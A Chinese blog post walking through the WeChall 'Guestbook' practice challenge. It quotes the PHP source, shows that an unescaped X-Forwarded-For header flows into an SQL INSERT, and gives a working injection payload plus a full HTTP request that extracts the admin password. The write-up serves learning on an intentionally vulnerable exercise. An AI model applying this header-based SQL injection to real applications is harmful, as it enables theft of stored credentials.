The Guestbook (Exploit, PHP, MySQL)-wechall练习

题目描述

地址:https://www.wechall.net/challenge/guestbook/index.php
The Guestbook
This time you have to exploit a small guestbook to retrieve the admin password.
Again you are given the guestbook sourcecode, also as highlighted version.
Currently there is no way to register or login to the guestbook tables, but an admin account already exists.
The solution is the Admin password, case sensitive.

Note: Every session gets it own guestbook to play with. However you should clear your guestbook when you are done, as your entries can be read by skilled players.

选手要在留言板找到管理员的密码,并且提供了源码。

关键代码

/**
 * Insert a message for current player.
 * @param int $userid
 * @param string $message
 */
function gbook_insertMessage($userid, $message)
{
        $db = gbook_db();
        
        $message = trim($message);
        $len = strlen($message);
        
        if ($len <= 3) {
                echo GWF_HTML::error('The Guestbook', 'Your message is too short.');
                return false;
        }
        
        if ($len > 256) {
                echo GWF_HTML::error('The Guestbook', 'Your message is too long.');
                return false;
        }
 
        # insert the entry      
        $playerid = gbook_playerID(true); // Current Player
        $userid = 0; # guestbook has no login yet.
        $time = time();
        $ip = gbook_getIP();
        $message = GDO::escape($message); 
        $query = "INSERT INTO gbook_book VALUES('$playerid', $userid, $time, '$ip', '$message')";
        if (false === $db->queryWrite($query)) {
                echo GWF_HTML::err('ERR_DATABASE', array(__FILE__, __LINE__));
                return false;
        }
        
        echo GWF_HTML::message('The Guestbook', 'Your entry has been added.');
        return true;
}

$playerid', $userid, $time, '$ip', '$message'这几个参数中,message过滤严格,且无法通过宽字节进行绕过,只有\(ip未过滤,且可以通过\)SERVER传参。查看$ip的参数传递

/**
 * Get IP
 */
function gbook_getIP()
{
        if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
                return $_SERVER['HTTP_X_FORWARDED_FOR'];
        }
        elseif (isset($_SERVER['HTTP_VIA'])) { 
                return $_SERVER['HTTP_VIA'];
        }
        else {
                return $_SERVER['REMOTE_ADDR'];
        }
}

伪造XFF进行注入:

X-Forwarded-For: 127.0.0.1,8888',(select gbu_password from gbook_user where gbu_name='admin')) -- a

POC

POST /challenge/guestbook/index.php HTTP/1.1
Host: www.wechall.net
Cookie: WC=16445202-59287-8uW5X2B1Us4lobCQ
Content-Length: 34
Cache-Control: max-age=0
Sec-Ch-Ua: "(Not(A:Brand";v="8", "Chromium";v="98"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: https://www.wechall.net
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
X-Forwarded-For: 127.0.0.1,8888',(select gbu_password from gbook_user where gbu_name='admin')) -- a
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://www.wechall.net/challenge/guestbook/index.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

message=cccnwe&sign=Sign+Guestbook

image

posted @ 2022-03-25 12:08  菜就多练forever  阅读(294)  评论(0)    收藏  举报